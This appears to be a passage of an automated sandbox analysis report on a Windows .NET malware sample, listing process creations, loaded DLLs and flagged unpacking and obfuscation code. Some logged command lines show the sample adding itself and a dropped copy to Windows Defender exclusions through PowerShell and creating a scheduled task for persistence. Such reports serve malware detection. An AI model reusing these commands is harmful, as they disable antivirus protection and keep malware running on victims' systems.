Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process created: C:\Users\user\Desktop\l2rMtmFkD6.exe "C:\Users\user\Desktop\l2rMtmFkD6.exe"
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown Process created: C:\Users\user\AppData\Roaming\ECcZgk.exe C:\Users\user\AppData\Roaming\ECcZgk.exe
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECcZgk" /XML "C:\Users\user\AppData\Local\Temp\tmp7D1E.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process created: C:\Users\user\AppData\Roaming\ECcZgk.exe "C:\Users\user\AppData\Roaming\ECcZgk.exe"
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\l2rMtmFkD6.exe" Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ECcZgk.exe" Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECcZgk" /XML "C:\Users\user\AppData\Local\Temp\tmp5831.tmp" Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Process created: C:\Users\user\Desktop\l2rMtmFkD6.exe "C:\Users\user\Desktop\l2rMtmFkD6.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECcZgk" /XML "C:\Users\user\AppData\Local\Temp\tmp7D1E.tmp"
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Process created: C:\Users\user\AppData\Roaming\ECcZgk.exe "C:\Users\user\AppData\Roaming\ECcZgk.exe"
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\ECcZgk.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: l2rMtmFkD6.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: l2rMtmFkD6.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: 0.2.l2rMtmFkD6.exe.5a70000.4.raw.unpack, MainForm.cs .Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.l2rMtmFkD6.exe.5f90000.5.raw.unpack, cekC21ULw7jnXCJgV1.cs .Net Code: JQYS2GA6rI System.Reflection.Assembly.Load(byte[])
Source: 0.2.l2rMtmFkD6.exe.2a0c9fc.0.raw.unpack, MainForm.cs .Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.l2rMtmFkD6.exe.3b20c50.2.raw.unpack, cekC21ULw7jnXCJgV1.cs .Net Code: JQYS2GA6rI System.Reflection.Assembly.Load(byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Code function: 0_2_00CBEEDA push eax; iretd 0_2_00CBEEE1
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Code function: 0_2_05C435C3 pushfd ; ret 0_2_05C435D2
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Code function: 0_2_05C435E3 pushfd ; ret 0_2_05C43602
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Code function: 0_2_05C4D488 push ebp; ret 0_2_05C4D45A
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Code function: 0_2_05C4C128 push ebp; ret 0_2_05C4C136
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Code function: 0_2_05C4C0E8 push esp; ret 0_2_05C4C0F6
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Code function: 0_2_05C4BDA8 push 544805C5h; ret 0_2_05C4BDB6
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Code function: 0_2_05C47C9E pushfd ; ret 0_2_05C47C9F
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Code function: 0_2_05C4BE38 push esp; ret 0_2_05C4BE46
Source: C:\Users\user\Desktop\l2rMtmFkD6.exe Code function: 0_2_05C4D9D5 push esp; ret 0_2_05C4D9D6
